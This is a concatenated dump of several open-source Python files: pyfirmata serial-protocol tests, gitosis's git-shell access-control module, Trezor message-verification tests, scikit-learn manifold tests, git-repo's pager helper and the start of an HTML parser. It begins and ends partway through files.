if num > len(self.data):
raise Exception('Tried to read more bytes than available.')
ret = self.data[:num]
del self.data[:num]
return ret
def write(self, bytes):
self.output.append(bytes)
def flushInput(self):
pass
def flushOutput(self):
pass
def close(self):
pass
class LexerTest(unittest.TestCase):
def setUp(self):
super(LexerTest, self).setUp()
self._real_serial = serial.Serial
self._port = MockSerial()
serial.Serial = lambda *args,**kargs: self._port
def tearDown(self):
super(LexerTest, self).tearDown()
serial.Serial = self._real_serial
def test_Basic(self):
port = MockSerial()
port.data = [chr(i) for i in (PROTOCOL_VERSION, 0x5, 0x2, SYSEX_START, SE_REPORT_FIRMWARE, 0x5, 0x2, 0x54, 0x0, 0x65, 0x0, 0x73, 0x0, 0x74, 0x0, SYSEX_END)]
reader = io.SerialReader(port, None)
state = reader.lexInitial()
while state != reader.lexInitial:
state = state()
self.assertEqual(dict(token='PROTOCOL_VERSION', major=5, minor=2), reader.q.get())
state = reader.lexInitial()
while state != reader.lexInitial:
state = state()
self.assertEqual(dict(token='REPORT_FIRMWARE', major=5, minor=2, name='Test'), reader.q.get())
def test_Mondo(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + MONDO_DATA[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(len(board.errors), 1)
self.assertIn('RESERVED_COMMAND', board.errors[0])
self.assertIn({0: 1, 1: 1, 4: 14}, board.pin_config)
self.assertEqual(20, len(board.pin_config))
self.assertEqual('5.2', board.firmware_version)
self.assertEqual('Test', board.firmware_name)
self.assertEqual(board.pin_state[13], 35)
self.assertEqual(board.pin_state[2], True)
class FirmataTest(unittest.TestCase):
def setUp(self):
super(FirmataTest, self).setUp()
self._real_serial = serial.Serial
self._port = MockSerial()
serial.Serial = lambda *args,**kargs: self._port
def tearDown(self):
super(FirmataTest, self).tearDown()
serial.Serial = self._real_serial
def test_QueryBoardState(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
self.board = firmata.Board('', 10, log_to_file=None, start_serial=True)
for i in xrange(20):
self.board.QueryPinState(i)
self.board.join(timeout=1)
self.board.StopCommunications()
self.assertEqual(self._port.output, [
# 0xF0 (START_SYSEX), 0X6D (PIN_STATE_QUERY), pin, 0XF7 (END_SYSEX)
'\xf0\x6d\x00\xf7', '\xf0\x6d\x01\xf7', '\xf0\x6d\x02\xf7', '\xf0\x6d\x03\xf7',
'\xf0\x6d\x04\xf7', '\xf0\x6d\x05\xf7', '\xf0\x6d\x06\xf7', '\xf0\x6d\x07\xf7',
'\xf0\x6d\x08\xf7', '\xf0\x6d\x09\xf7', '\xf0\x6d\x0a\xf7', '\xf0\x6d\x0b\xf7',
'\xf0\x6d\x0c\xf7', '\xf0\x6d\x0d\xf7', '\xf0\x6d\x0e\xf7', '\xf0\x6d\x0f\xf7',
'\xf0\x6d\x10\xf7', '\xf0\x6d\x11\xf7', '\xf0\x6d\x12\xf7', '\xf0\x6d\x13\xf7',])
def test_FirmataInit(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file='/tmp/testlog', start_serial=True)
board.join(timeout=2)
board.StopCommunications()
self.assertEqual(board.pin_mode[2], 1)
self.assertEqual(board.pin_mode[3], 1)
self.assertEqual(board.pin_mode[4], 1)
self.assertEqual(board.pin_mode[5], 1)
self.assertEqual(board.pin_mode[6], 1)
self.assertEqual(board.pin_mode[7], 1)
self.assertEqual(board.pin_mode[8], 1)
self.assertEqual(board.pin_mode[9], 1)
self.assertEqual(board.pin_mode[10], 1)
self.assertEqual(board.pin_mode[11], 1)
self.assertEqual(board.pin_mode[12], 1)
self.assertEqual(board.pin_mode[13], 1)
self.assertEqual(board.pin_mode[14], 2)
self.assertEqual(board.pin_mode[15], 2)
self.assertEqual(board.pin_mode[16], 2)
self.assertEqual(board.pin_mode[17], 2)
self.assertEqual(board.pin_mode[18], 2)
self.assertEqual(board.pin_mode[19], 2)
for i in xrange(2,19):
self.assertEqual(board.pin_state[i], 0)
def test_basicDigitalWrite(self):
"""Test basic functionality of digitalWrite()."""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\x91\x00\x00'])
def test_digitalWriteDoesntLeakBits(self):
"""Test that digitalWrite() doesn't let one pin's value affect another's"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.pin_mode[14] = MODE_OUTPUT # Lie
board.pin_state[14] = 0xff # Same pseudo-port as pin 8
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\x91\x40\x00'])
# This test is flaky, not sure why
# output seen:
# ['\x91@\x00']
def test_digitalWriteHasNoAnalogLeaks(self):
"""Test that analog values don't leak into digitalWrite()."""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.pin_state[14] = 255 # Same pseudo-port as pin 8
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
print self._port.output
self.assertEqual(self._port.output, ['\x91\x00\x00'])
def test_I2CRead(self):
"""Test simple I2C read query is properly sent and reply lexxed"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.I2CConfig(0)
old_sysex = board.SendSysex
def FakeSysex(*args, **kargs):
self._port.data.extend(I2C_REPLY_MESSAGE[:])
old_sysex(*args, **kargs)
board.SendSysex = FakeSysex
reply = board._i2c_device.I2CRead(0x4f, 0x00, 2) # read 2 bytes from register 0
board.join(timeout=1)
board.StopCommunications()
# | i2c config | | start | addr | reg | 2 | end
self.assertEqual(self._port.output, ['\xf0\x78\x00\x00\xf7', '\xf0\x76\x4f\x08\x00\x00\x02\x00\xf7'])
self.assertEqual(reply, I2C_REPLY_DICT['data'])
def test_I2CWriteSend(self):
"""Test simple I2C write query is properly sent"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.I2CConfig(0)
board._i2c_device.I2CWrite(0x4f, 0x00, [0x7f, 0xff]) # write 2 bytes to register 0
board.join(timeout=1)
board.StopCommunications()
# | i2c config | | start | addr | reg | 2 bytes | end
self.assertEqual(self._port.output, ['\xf0\x78\x00\x00\xf7', '\xf0\x76\x4f\x00\x00\x00\x7f\x00\x7f\x01\xf7'])
def test_ListenerReuse(self):
"""Test that DispatchToken() will properly recycle listeners that request it"""
board = firmata.Board('', 10, log_to_file=None, start_serial=False)
def FakeListener(token):
return (False, True) # don't delete, do abort processing
FAKE_TOKEN = 'RESPONSE'
board.AddListener(FAKE_TOKEN, FakeListener)
token = {'token': FAKE_TOKEN}
board.DispatchToken(token)
self.assertEqual(board._listeners[FAKE_TOKEN], [FakeListener])
def test_OneTimeListener(self):
"""Test that DispatchToken() will properly delete listeners that request it"""
board = firmata.Board('', 10, log_to_file=None, start_serial=False)
def FakeListener(token):
return (True, True) # do delete, do abort processing
FAKE_TOKEN = 'RESPONSE'
board.AddListener(FAKE_TOKEN, FakeListener)
token = {'token': FAKE_TOKEN}
board.DispatchToken(token)
self.assertEqual(board._listeners[FAKE_TOKEN], [])
def test_SetSamplingInterval(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.SetSamplingInterval(1000)
board.SetSamplingInterval()
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\xf0\x7a\x68\x07\xf7', '\xf0\x7a\x13\x00\xf7'])
def test_StringData(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + FIRMATA_STRING_DATA[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(board.errors, ['Hello'])
| apache-2.0 |
elmer/smart-gitosis | gitosis/serve.py | 2 | 8691 | """
Enforce git-shell to only serve allowed by access control policy.
directory. The client should refer to them without any extra directory
prefix. Repository names are forced to match ALLOW_RE.
"""
import logging
import sys, os, re
from gitosis import access
from gitosis import repository
from gitosis import gitweb
from gitosis import gitdaemon
from gitosis import app
from gitosis import util
import amqplib.client_0_8 as amqp
import simplejson as json
log = logging.getLogger('gitosis.serve')
ALLOW_RE = re.compile("^'/*(?P<path>[a-zA-Z0-9][a-zA-Z0-9@._-]*(/[a-zA-Z0-9][a-zA-Z0-9@._-]*)*)'$")
COMMANDS_READONLY = [
'git-upload-pack',
'git upload-pack',
]
COMMANDS_WRITE = [
'git-receive-pack',
'git receive-pack',
]
class ServingError(Exception):
"""Serving error"""
def __str__(self):
return '%s' % self.__doc__
class CommandMayNotContainNewlineError(ServingError):
"""Command may not contain newline"""
class UnknownCommandError(ServingError):
"""Unknown command denied"""
class UnsafeArgumentsError(ServingError):
"""Arguments to command look dangerous"""
class AccessDenied(ServingError):
"""Access denied to repository"""
class WriteAccessDenied(AccessDenied):
"""Repository write access denied"""
class ReadAccessDenied(AccessDenied):
"""Repository read access denied"""
def amqp_config(config):
return {
'host': config.get("amqp", "host"),
'user_id': config.get("amqp", "user_id"),
'password': config.get("amqp", "password"),
'ssl': config.getboolean("amqp", "ssl"),
'exchange': config.get("amqp", "exchange"),
}
def send_amqp_message(host="localhost", user_id="guest", password="guest", ssl=True,
exchange="gitosis.post_update", data={}):
m = json.dumps(data)
log.info('Sending "%s" to: %s' % (m, exchange))
msg = amqp.Message(m, content_type='text/plain')
conn = amqp.Connection(host, userid=user_id, password=password, ssl=ssl)
ch = conn.channel()
ch.access_request('/data', active=True, write=True)
ch.exchange_declare(exchange, 'fanout', auto_delete=False)
ch.basic_publish(msg, exchange)
ch.close()
conn.close()
return True
def repository_path( cfg, user, command ):
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
return path
## determines if we should send a message or not
def should_send_message( cfg, user, command ):
if not cfg.has_section('amqp'):
return False
if '\n' in command:
raise CommandMayNotContainNewlineError()
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
## only send the message if we have use_amqp set in the config file...
if not cfg.getboolean("amqp", "use_amqp"):
return False
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
if ( verb in COMMANDS_WRITE ):
return True
else:
return False
def serve(cfg, user, command):
if '\n' in command:
raise CommandMayNotContainNewlineError()
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
if (verb not in COMMANDS_WRITE
and verb not in COMMANDS_READONLY):
raise UnknownCommandError()
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
# write access is always sufficient
newpath = access.haveAccess(
config=cfg,
user=user,
mode='writable',
path=path)
if newpath is None:
# didn't have write access; try once more with the popular
# misspelling
newpath = access.haveAccess(
config=cfg,
user=user,
mode='writeable',
path=path)
if newpath is not None:
log.warning(
'Repository %r config has typo "writeable", '
+'should be "writable"',
path,
)
if newpath is None:
# didn't have write access
newpath = access.haveAccess(
config=cfg,
user=user,
mode='readonly',
path=path)
if newpath is None:
raise ReadAccessDenied()
if verb in COMMANDS_WRITE:
# didn't have write access and tried to write
raise WriteAccessDenied()
(topdir, relpath) = newpath
assert not relpath.endswith('.git'), \
'git extension should have been stripped: %r' % relpath
repopath = '%s.git' % relpath
fullpath = os.path.join(topdir, repopath)
if (not os.path.exists(fullpath)
and verb in COMMANDS_WRITE):
# it doesn't exist on the filesystem, but the configuration
# refers to it, we're serving a write request, and the user is
# authorized to do that: create the repository on the fly
# create leading directories
p = topdir
for segment in repopath.split(os.sep)[:-1]:
p = os.path.join(p, segment)
util.mkdir(p, 0750)
repository.init(path=fullpath)
gitweb.set_descriptions(config=cfg)
generated = util.getGeneratedFilesDir(config=cfg)
gitweb.write_project_list(cfg,
os.path.join(generated, 'projects.list')
)
gitdaemon.set_export_ok(cfg)
# put the verb back together with the new path
newcmd = "%(verb)s '%(path)s'" % dict(
verb=verb,
path=fullpath,
)
return newcmd
class Main(app.App):
def create_parser(self):
parser = super(Main, self).create_parser()
parser.set_usage('%prog [OPTS] USER')
parser.set_description(
'Allow restricted git operations under DIR')
return parser
def handle_args(self, parser, cfg, options, args):
try:
(user,) = args
except ValueError:
parser.error('Missing argument USER.')
main_log = logging.getLogger('gitosis.serve.main')
os.umask(0022)
cmd = os.environ.get('SSH_ORIGINAL_COMMAND', None)
if cmd is None:
main_log.error('Need SSH_ORIGINAL_COMMAND in environment.')
sys.exit(1)
main_log.debug('Got command %(cmd)r' % dict(
cmd=cmd,
))
os.chdir(os.path.expanduser('~'))
try:
newcmd = serve(
cfg=cfg,
user=user,
command=cmd,
)
except ServingError, e:
main_log.error('%s', e)
sys.exit(1)
## if we are writing then we need to
main_log.debug('Serving %s', newcmd)
pid = os.fork()
if not pid:
os.execvp('git', ['git', 'shell', '-c', newcmd])
main_log.error('Cannot execute git-shell.')
sys.exit(1)
else:
os.wait()
try:
if (should_send_message( cfg=cfg, user=user, command=cmd )):
send_amqp_message(data={'repository': repository_path(cfg=cfg, user=user, command=cmd)}, **amqp_config(cfg))
except ServingError, e:
main_log.error('%s', e)
sys.exit(1)
| gpl-2.0 |
jhoenicke/python-trezor | trezorlib/tests/device_tests/test_msg_verifymessage_segwit.py | 3 | 4567 | # This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
from trezorlib import btc
from .common import TrezorTest
class TestMsgVerifymessageSegwit(TrezorTest):
def test_message_long(self):
self.setup_mnemonic_nopin_nopassphrase()
ret = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"245ff795c29aef7538f8b3bdb2e8add0d0722ad630a140b6aefd504a5a895cbd867cbb00981afc50edd0398211e8d7c304bb8efa461181bc0afa67ea4a720a89ed"
),
"VeryLongMessage!" * 64,
)
assert ret is True
def test_message_testnet(self):
self.setup_mnemonic_nopin_nopassphrase()
ret = btc.verify_message(
self.client,
"Testnet",
"2N4VkePSzKH2sv5YBikLHGvzUYvfPxV6zS9",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message.",
)
assert ret is True
def test_message_verify(self):
self.setup_mnemonic_nopin_nopassphrase()
# trezor pubkey - OK
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message.",
)
assert res is True
# trezor pubkey - FAIL - wrong sig
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be00"
),
"This is an example of a signed message.",
)
assert res is False
# trezor pubkey - FAIL - wrong msg
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message!",
)
assert res is False
def test_verify_utf(self):
self.setup_mnemonic_nopin_nopassphrase()
words_nfkd = u"Pr\u030ci\u0301s\u030cerne\u030c z\u030clut\u030couc\u030cky\u0301 ku\u030an\u030c u\u0301pe\u030cl d\u030ca\u0301belske\u0301 o\u0301dy za\u0301ker\u030cny\u0301 uc\u030cen\u030c be\u030cz\u030ci\u0301 pode\u0301l zo\u0301ny u\u0301lu\u030a"
words_nfc = u"P\u0159\xed\u0161ern\u011b \u017elu\u0165ou\u010dk\xfd k\u016f\u0148 \xfap\u011bl \u010f\xe1belsk\xe9 \xf3dy z\xe1ke\u0159n\xfd u\u010de\u0148 b\u011b\u017e\xed pod\xe9l z\xf3ny \xfal\u016f"
res_nfkd = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"24d0ec02ed8da8df23e7fe9e680e7867cc290312fe1c970749d8306ddad1a1eda41c6a771b13d495dd225b13b0a9d0f915a984ee3d0703f92287bf8009fbb9f7d6"
),
words_nfkd,
)
res_nfc = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"24d0ec02ed8da8df23e7fe9e680e7867cc290312fe1c970749d8306ddad1a1eda41c6a771b13d495dd225b13b0a9d0f915a984ee3d0703f92287bf8009fbb9f7d6"
),
words_nfc,
)
assert res_nfkd is True
assert res_nfc is True
| lgpl-3.0 |
ankurankan/scikit-learn | sklearn/manifold/tests/test_locally_linear.py | 41 | 4827 | from itertools import product
from nose.tools import assert_true
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from scipy import linalg
from sklearn import neighbors, manifold
from sklearn.manifold.locally_linear import barycenter_kneighbors_graph
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import ignore_warnings
eigen_solvers = ['dense', 'arpack']
#----------------------------------------------------------------------
# Test utility routines
def test_barycenter_kneighbors_graph():
X = np.array([[0, 1], [1.01, 1.], [2, 0]])
A = barycenter_kneighbors_graph(X, 1)
assert_array_almost_equal(
A.toarray(),
[[0., 1., 0.],
[1., 0., 0.],
[0., 1., 0.]])
A = barycenter_kneighbors_graph(X, 2)
# check that columns sum to one
assert_array_almost_equal(np.sum(A.toarray(), 1), np.ones(3))
pred = np.dot(A.toarray(), X)
assert_less(linalg.norm(pred - X) / X.shape[0], 1)
#----------------------------------------------------------------------
# Test LLE by computing the reconstruction error on some manifolds.
def test_lle_simple_grid():
# note: ARPACK is numerically unstable, so this test will fail for
# some random seeds. We choose 2 because the tests pass.
rng = np.random.RandomState(2)
tol = 0.1
# grid of equidistant points in 2D, n_components = n_dim
X = np.array(list(product(range(5), repeat=2)))
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
clf = manifold.LocallyLinearEmbedding(n_neighbors=5,
n_components=n_components,
random_state=rng)
tol = 0.1
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X, 'fro')
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
assert_less(reconstruction_error, tol)
assert_almost_equal(clf.reconstruction_error_,
reconstruction_error, decimal=1)
# re-embed a noisy version of X using the transform method
noise = rng.randn(*X.shape) / 100
X_reembedded = clf.transform(X + noise)
assert_less(linalg.norm(X_reembedded - clf.embedding_), tol)
def test_lle_manifold():
rng = np.random.RandomState(0)
# similar test on a slightly more complex manifold
X = np.array(list(product(np.arange(18), repeat=2)))
X = np.c_[X, X[:, 0] ** 2 / 18]
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
for method in ["standard", "hessian", "modified", "ltsa"]:
clf = manifold.LocallyLinearEmbedding(n_neighbors=6,
n_components=n_components,
method=method, random_state=0)
tol = 1.5 if method == "standard" else 3
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X)
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
details = ("solver: %s, method: %s" % (solver, method))
assert_less(reconstruction_error, tol, msg=details)
assert_less(np.abs(clf.reconstruction_error_ -
reconstruction_error),
tol * reconstruction_error, msg=details)
def test_pipeline():
# check that LocallyLinearEmbedding works fine as a Pipeline
# only checks that no error is raised.
# TODO check that it actually does something useful
from sklearn import pipeline, datasets
X, y = datasets.make_blobs(random_state=0)
clf = pipeline.Pipeline(
[('filter', manifold.LocallyLinearEmbedding(random_state=0)),
('clf', neighbors.KNeighborsClassifier())])
clf.fit(X, y)
assert_less(.9, clf.score(X, y))
# Test the error raised when the weight matrix is singular
def test_singular_matrix():
from nose.tools import assert_raises
M = np.ones((10, 3))
f = ignore_warnings
assert_raises(ValueError, f(manifold.locally_linear_embedding),
M, 2, 1, method='standard', eigen_solver='arpack')
if __name__ == '__main__':
import nose
nose.runmodule()
| bsd-3-clause |
finik/git-repo | pager.py | 86 | 2051 | #
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import select
import sys
active = False
def RunPager(globalConfig):
global active
if not os.isatty(0) or not os.isatty(1):
return
pager = _SelectPager(globalConfig)
if pager == '' or pager == 'cat':
return
# This process turns into the pager; a child it forks will
# do the real processing and output back to the pager. This
# is necessary to keep the pager in control of the tty.
#
try:
r, w = os.pipe()
pid = os.fork()
if not pid:
os.dup2(w, 1)
os.dup2(w, 2)
os.close(r)
os.close(w)
active = True
return
os.dup2(r, 0)
os.close(r)
os.close(w)
_BecomePager(pager)
except Exception:
print("fatal: cannot start pager '%s'" % pager, file=sys.stderr)
sys.exit(255)
def _SelectPager(globalConfig):
try:
return os.environ['GIT_PAGER']
except KeyError:
pass
pager = globalConfig.GetString('core.pager')
if pager:
return pager
try:
return os.environ['PAGER']
except KeyError:
pass
return 'less'
def _BecomePager(pager):
# Delaying execution of the pager until we have output
# ready works around a long-standing bug in popularly
# available versions of 'less', a better 'more'.
#
_a, _b, _c = select.select([0], [], [0])
os.environ['LESS'] = 'FRSX'
try:
os.execvp(pager, [pager])
except OSError:
os.execv('/bin/sh', ['sh', '-c', pager])
| apache-2.0 |
40223119/2015cda | static/Brython3.1.1-20150328-091302/Lib/html/parser.py | 737 | 19605 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import _markupbase
import re
import warnings
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile('[a-zA-Z][^\t\n\r\f />\x00]*')
# Note:
# 1) the strict attrfind isn't really strict, but we can't make it
# correctly strict without breaking backward compatibility;
# 2) if you change attrfind remember to update locatestarttagend too;
# 3) if you change attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
attrfind = re.compile(
r'\s*([a-zA-Z_][-.:a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[^\s"\'=<>`]*))?')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile('</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParseError(Exception):
"""Exception raised for all parse errors."""
def __init__(self, msg, position=(None, None)):
assert msg
self.msg = msg
self.lineno = position[0]
self.offset = position[1]
def __str__(self):
result = self.msg
if self.lineno is not None:
result = result + ", at line %d" % self.lineno
if self.offset is not None:
result = result + ", column %d" % (self.offset + 1)
return result
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). Entity references are
passed by calling self.handle_entityref() with the entity
reference as the argument. Numeric character references are
passed to self.handle_charref() with the string containing the
reference as the argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, strict=False):
"""Initialize and reset this instance.
If strict is set to False (the default) the parser will parse invalid
markup, otherwise it will raise an error. Note that the strict mode
is deprecated.
"""
if strict:
warnings.warn("The strict mode is deprecated.",
DeprecationWarning, stacklevel=2)
self.strict = strict
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
def error(self, message):
raise HTMLParseError(message, self.getpos())
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j: self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
